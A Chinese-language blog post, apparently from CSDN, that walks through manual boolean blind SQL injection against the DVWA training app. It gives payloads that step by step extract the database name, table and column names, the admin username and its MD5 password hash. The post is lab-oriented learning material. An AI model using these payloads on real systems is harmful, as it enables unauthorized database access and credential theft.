DVWA盲注详解

最新推荐文章于 2024-07-03 09:32:31 发布
最新推荐文章于 2024-07-03 09:32:31 发布
阅读量6.6k 收藏 43
点赞数 15
分类专栏: 笔记 文章标签: SQL盲注 数据库安全 注入攻击 ASCII码 information_schema
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45788625/article/details/124252754
版权

盲注详解

一、sql盲注的过程

1、判断是否存在注入,注入是字符型还是数字型

2、猜解当前数据库名–>猜数据库的长度–>猜数据库的名称

3、猜解数据库中的表名–>猜表的数量–>猜表的长度–>猜表的名称

4、猜解表中的字段名–>猜列的数量–>猜列的长度–>列的名称

5、猜解账号和密码

二、手动盲注过程

1、判断是否存在注入,注入是字符型还是数字型

1 and 1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述
说明存在字符型SQL注入

因为假设是字符型在后台sql查询应该是

select * from users where id='1 and 1=1'

select * from users where id='1 and 1=2'

这样就不会报错

但如果是数字型,那么查询语句就会是

select * from users where id=1 and 1=1

select * from users where id=1 and 1=2

此时就会对第二条语句进行数值判断返回错误,但实际上,并未返回错误。故没有进行数值判断,是字符型注入。

2、猜解当前数据库名:猜数据库的长度–>猜数据库的名称

(1)猜数据库名长度

database()函数返回当前数据库的名称
length()用于获取字符串长度

1' and length(databbase())=1#

在这里插入图片描述

1' and length(database())=2#

在这里插入图片描述

1' and length(database())=3#

在这里插入图片描述

1' and length(database())=4#

在这里插入图片描述
所以当前数据库名有4个字符长度

(2)猜数据库的名称

ascii()返回字符的ASCII码

substr(str,start,length)返回字符串从str的start开始往后截取length长度的字符

1' and ascii(substr(database(),1,1))>90#

在这里插入图片描述

1' and ascii(substr(database(),1,1))>100#

在这里插入图片描述

第一位字符的ascii码在90-100之间

1' and ascii(substr(database(),1,1))>95#

在这里插入图片描述

第一位字符的ascii码在95-100之间

1' and ascii(substr(database(),1,1))>97#

在这里插入图片描述

第一位字符的ascii码在97-100之间

1' and ascii(substr(database(),1,1))>98#

在这里插入图片描述

第一位字符的ascii码在98-100之间

1' and ascii(substr(database(),1,1))>99#

在这里插入图片描述

第一位字符的ascii码在99-100之间

1' and ascii(substr(database(),1,1))=100#

在这里插入图片描述

所以第一位字符的ascii码是100

以此类推找出所有

结果是

1' and ascii(substr(database(),1,1))=100#

在这里插入图片描述

1' and ascii(substr(database(),2,1))=118#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peO2exDt-1650270278743)(C:\Users\31207\AppData\Roaming\Typora\typora-user-images\image-20220414171429193.png)]

1' and ascii(substr(database(),3,1))=119#

在这里插入图片描述

1' and ascii(substr(database(),4,1))=97#

在这里插入图片描述

在这里插入图片描述

对照ASCII表,所以当前数据库名为dvwa

3、猜解数据库中的表名:猜表的数量–>猜表的名称的长度–>猜表的名称

information_schema.tables 可查看表的属性

字段:
table_name  表名称
table_schema 数据表所属的数据库名
(1)猜表的数量
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#

在这里插入图片描述

1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=3#

在这里插入图片描述

所以表的数量是2

(2)猜表的名称的长度
limit 0,1 用于接收select查询的结果从第0行开始检索1行
substr(str,pos)返回从pos开始的所有字符

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#

在这里插入图片描述

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#

在这里插入图片描述

(3)猜表的名称

按照2.2的方法猜表的名称

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103#g

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2))=117#u

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),3))=101#e

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),4))=115#s

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),5))=116#t

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),6))=98#b

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),7))=111#0

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),8))=111#0

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107#k

在这里插入图片描述

所以第一个表的表名为guestbook

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117#u

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2))=115#s

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3))=101#e

在这里插入图片描述

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4))=114#r


1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5))=115#s

在这里插入图片描述

所以第二个表名是users

4、猜解表中的字段名–>猜列的数量–>猜列的长度–>列的名称

(1)猜列的数量

一个一个猜,这里省略

1' and (select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')=8 #

在这里插入图片描述

(2)猜列的名称的长度
1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1 ) ,1 ) )=7#

在这里插入图片描述

第一列的列名长度为:7

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1 ) ,1) )=10#

在这里插入图片描述

第二的列名长度为:10

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1 ) ,1) )=9#

在这里插入图片描述

第三列的列名长度为:9

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,1) )=4#

在这里插入图片描述

第四列的列名长度为:4

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1 ) ,1) )=8#

在这里插入图片描述

第五列的列名长度为:8

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1 ) ,1) )=6#

在这里插入图片描述

第六列的列名长度为:6

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 6,1 ) ,1) )=10#

在这里插入图片描述

第七列的列名长度为:10

1' and length(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 7,1 ) ,1) )=12#

在这里插入图片描述

第八列的列名长度为:12

(3)猜列的名称

猜解过程省略,我们就演示猜解user的过程

1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,1,1) )=117# u

在这里插入图片描述

1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,2,1) )=115# s

在这里插入图片描述

1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,3,1) )=101# e

在这里插入图片描述

1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1 ) ,4,1) )=114# r

在这里插入图片描述

类似的我们猜解password

1' and ascii(substr( ( select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1 ) ,1,1) )=112# p

在这里插入图片描述

依此类推,这里就不展示了

我们可以推出

第三列为user,第四列为password

5、猜解账号和密码

user字段中第一个数据的长度
1’ and length(substr((select user from users limit 0,1),1))=5 #

在这里插入图片描述

第一个数据长度是5

user字段数据的名称(第一,第二…)
1’ and ascii(substr((select user from users limit 0,1),1,1))=97 #a

在这里插入图片描述

1’ and ascii(substr((select user from users limit 0,1),2,1))=100 #d

在这里插入图片描述

1’ and ascii(substr((select user from users limit 0,1),3,1))=109#m

在这里插入图片描述

第一个数据的第一个字母是a,…
以此类推 得到第一个数据是admin
然后查第二个数据

password字段中的数据个数

1’ and (select count(password) from users)=5 #

在这里插入图片描述

有5个数据(证明五个用户名对应了五个密码)

password字段中的数据长度

1’ and length(substr((select password from users limit 0,1),1))= 32#

在这里插入图片描述

第一个数据长度是32

用代码逐个猜解太麻烦

猜测是md5加密

方式①:用二分法依次猜解user/password字段中每组字段值的每个字符组成

方式②:利用日常积累经验猜测+运气,去碰撞完整字段值的全名
在这里插入图片描述

猜解验证:

1' and (select count(*) from users where user='admin')=1 #

在这里插入图片描述

显示成功 有个数据是admin

1’ and (select count(*) from users where user=‘admin’ and password=‘5f4dcc3b5aa765d61d8327deb882cf99’)=1 #

在这里插入图片描述

显示成功

方式①的猜解准确率和全面性较高,但是手工猜解花费的时间比较长;方式②猜解效率可能稍快一些,手工猜解的命中率较低,如果用户名or密码字典数据较少,可能会漏掉数据没有猜解出来,不确定性较多。实际猜解过程中,可以结合两种方法一起来尝试,互相补充。

进一步验证

将以上admin–password填写到前台登录界面的两个输入框中,尝试登录是否成功

附录:https://www.cmd5.com/ md5解密网站

在这里插入图片描述

破解的全部内容如下:

在这里插入图片描述

极客黑洞
关注
  • 15
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DVWASQL注入(盲注
天空之蓝的博客
11-17 2985
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
最新发布
Libra1313的博客
07-03 1760
DVWA代表Damn Vulnerable Web Application,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过攻击这些漏洞场景来学习和实践漏洞利用技术。这些漏洞包括常见的安全问题,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。通过攻击这些漏洞,用户可以了解漏洞的原理、影响和防御方法。
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2827
DVWA------SQL Injection (Blind)(SQL盲注
dvwaSQL盲注
ANDTM的博客
05-30 1012
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注
DVWAsql注入——盲注
Williamanddog的博客
12-22 3101
DVWA盲注
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5579
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
基于dvwasql盲注(Blind)-低中高
滕财然的博客
11-15 2808
目录sql盲注sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 736
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA大通关详解(持续更新)
世间繁华梦一出
11-25 4067
** LOW ** BRUTE Force(爆库) <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FRO
【网络安全 | 2万字总结】SQL盲注?这一篇就够了。
热门推荐
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
DVWA各个关卡源码分析
不想当脚本小子的脚本小子
12-19 2309
前一阵子做完DVWA靶场以后只是做了通关练习,现在将DVWA各个关卡的源码分析一下,有利于更好的理解漏洞的原理与攻防。我主要是分析一下源码,看看它为什么会有漏洞以及不同等级是如何防御的 SQL注入: 原理:SQL注入是指web应用程序对用户输入数据的合法行没有判断,前端传入后端的参数是可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。就是说前端的输入影响了后端的数据。 主要满足两个条件:1.参数用户可控。2.参数代入数据库查询 ...
DVWA sql盲注手工
永不垂头的博客
08-03 390
学习笔记—DVWA sql盲注手工 一、dvwasql盲注手工 1’and ascii(substr(database(),2,1))>'97 exists 1’and ascii(substr(database(),2,1))<'122 exists 1’and ascii(substr(database(),2,1))<'119 exists 1’and ascii(substr(database(),2,1))<'118 MISSING 1’and ascii(subs
dvwa-sql盲注
AI_SumSky的博客
11-27 4675
sql盲注 low级别 先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。 分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。 其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database. 输入1’ and length(database())=2#,显示User ID is MISSING from
DVWA下的盲注<SQLmap工具注入>
weixin_34380948的博客
07-10 146
LOW难度!!!所需工具: DVWA环境、抓包工具、sqlmap抓包工具用fiddler为例。=====================================先进入DVWA调整模式为LOW打开抓包工具,确定可以抓到http流量包DVWA下选择SQL盲注,随意输入一个USER ID后回车会看到回显,用户ID存在复制该网页链接,保存到记事本,等下sqlmap用用抓包工具...
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4653
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA-sql盲注
Darklord.W
04-09 812
sql盲注低中高步骤截图及说明 低等级: 判断是否存在注入,注入是字符型还是数字型 猜解数据库 库名长度为4 猜数据库名dvwa substr() 函数返回字符串的一部分 substr(string,start,length) 猜数据库中表名 可得表个数为2 猜表的长度 第一个为9,第二个为5 猜表名 1' and ascii(substr(...
DVWA(sql注入 盲注)
weixin_44023403的博客
12-20 534
sql注入(盲注SQL Injection(盲注)LowMediumHigh SQL Injection(盲注SQL盲注,其实和SQL注入差不多,只是比它难一点利用,注入时返回的数据只有正确和错误,不会返回其他信息。 基于布尔的盲注 可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
Zichel77的博客
04-08 2012
盲注,有两种主要类型,包括布尔盲注和时间盲注
dvwa sql盲注高级
08-11
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值